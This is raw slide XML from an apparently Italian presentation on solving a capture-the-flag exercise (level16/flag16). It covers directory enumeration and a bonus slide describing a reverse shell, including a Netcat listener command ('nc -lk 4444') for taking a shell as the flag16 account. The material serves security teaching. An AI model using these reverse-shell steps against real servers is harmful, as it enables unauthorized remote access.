            <a:ext cx="4647851" cy="194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9300">
                <a:solidFill>
                  <a:srgbClr val="00CFBE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BONUS</a:t>
            </a:r>
            <a:endParaRPr sz="9300">
              <a:solidFill>
                <a:srgbClr val="00CFBE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1843" name="Google Shape;1843;p61"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1283220" y="845540"/>
            <a:ext cx="1261500" cy="1284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it-IT"/>
              <a:t>⭐</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Elemento grafico 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBE6BF82-ACCE-8EB3-A888-A858B3891E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36369" y="680327"/>
            <a:ext cx="3782846" cy="3782846"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2271590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39" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="64122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it-IT"/>
              <a:t>BONUS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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976;p108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE827554-4B0E-E24D-93EB-E98E9CD0BFE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010583" y="1252219"/>
            <a:ext cx="7313596" cy="341644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285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>Ormai sappiamo dove attaccare, ma possiamo farlo in un’altra maniera: tramite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>reverse shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:endParaRPr lang="it-IT" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>Il che significa che forzeremo il server a fornirci un prompt di shell dall’account </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1"/>
              <a:t>flag16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t> su cui opera lo script del server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:endParaRPr lang="it-IT" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>La prima cosa che dobbiamo fare è impostare un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" err="1"/>
              <a:t>listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t> su un nuovo terminale e lo apriamo digitando ALT+F2:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:endParaRPr lang="it-IT" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" u="sng" err="1">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t> può eseguire funzioni client/server che consentono di creare una «chat» con la macchina che si connette.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 4444</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:endParaRPr lang="it-IT" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1"/>
              <a:t>«-l»</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> ascolta una connessione in entrata</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>«k»</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>  forza </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> a rimanere sempre in attesa di un’altra connessione dopo che quella corrente viene completata. </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3202001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fade">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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fade">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">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9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">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animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="37"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39" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="64122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ANALISI DIRECTORY ACCESSIBILI</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1441" name="Google Shape;1441;p53"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="941673" y="1429627"/>
            <a:ext cx="7704000" cy="738609"/>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it-IT" sz="1600" dirty="0"/>
              <a:t>Sono a disposizione dell’utente level16 le seguenti home directory:</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ls/home/level*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s/home/flag*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C2AF53C-3059-A800-5338-8C37A4255F84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="941673" y="2529481"/>
            <a:ext cx="7704000" cy="738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0" indent="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>ma l’utente può accedere solamente alle directory:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/home/level16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/home/flag16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44A0A3F8-7A78-C591-5403-BFC7F0AAB7C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="941673" y="3629335"/>
            <a:ext cx="7704000" cy="66875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0" indent="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>La directory /home/level16 non sembra contenere materiale interessante.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="131003678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41">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="144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41">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="144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441">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="144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0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">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animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>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
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">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39" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="64122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it-IT"/>
              <a:t>FILE SOLUZIONE AGGIORNATO</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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Immagine 3" descr="Immagine che contiene testo&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE53613F-DDBF-5310-8EA3-BDF962B45E1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1142083" y="1095426"/>
            <a:ext cx="6849431" cy="3600953"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1633480383"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cove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39" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="64122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BONUS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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Immagine 5" descr="Immagine che contiene testo&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBB1B65E-95EF-BD1F-D04D-23CA65097E3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1256348" y="1119494"/>
            <a:ext cx="6620901" cy="3688524"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24644040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39" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="64122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BONUS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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demo">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7FD8E1A-8AB2-26FB-45EF-8DD72CE79A0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85424" y="1119494"/>
            <a:ext cx="6762750" cy="3714750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3987307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718"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3719" name="Google Shape;3719;p88"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474282"/>
            <a:ext cx="77040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88"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719999" y="1418900"/>
            <a:ext cx="4489309" cy="2364903"/>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6000" dirty="0"/>
              <a:t>GRAZIE PER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="8000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L’ATTENZIONE</a:t>
            </a:r>
            <a:endParaRPr sz="8000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3896" name="Google Shape;3896;p88"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649144"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3897" name="Google Shape;3897;p88"/>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88"/>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88"/>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257;p52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FAEC1D1-9A76-D17B-2D7C-69BF23B9B88B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1380623" y="3743681"/>
            <a:ext cx="2505630" cy="559376"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8541"/>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58;p52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
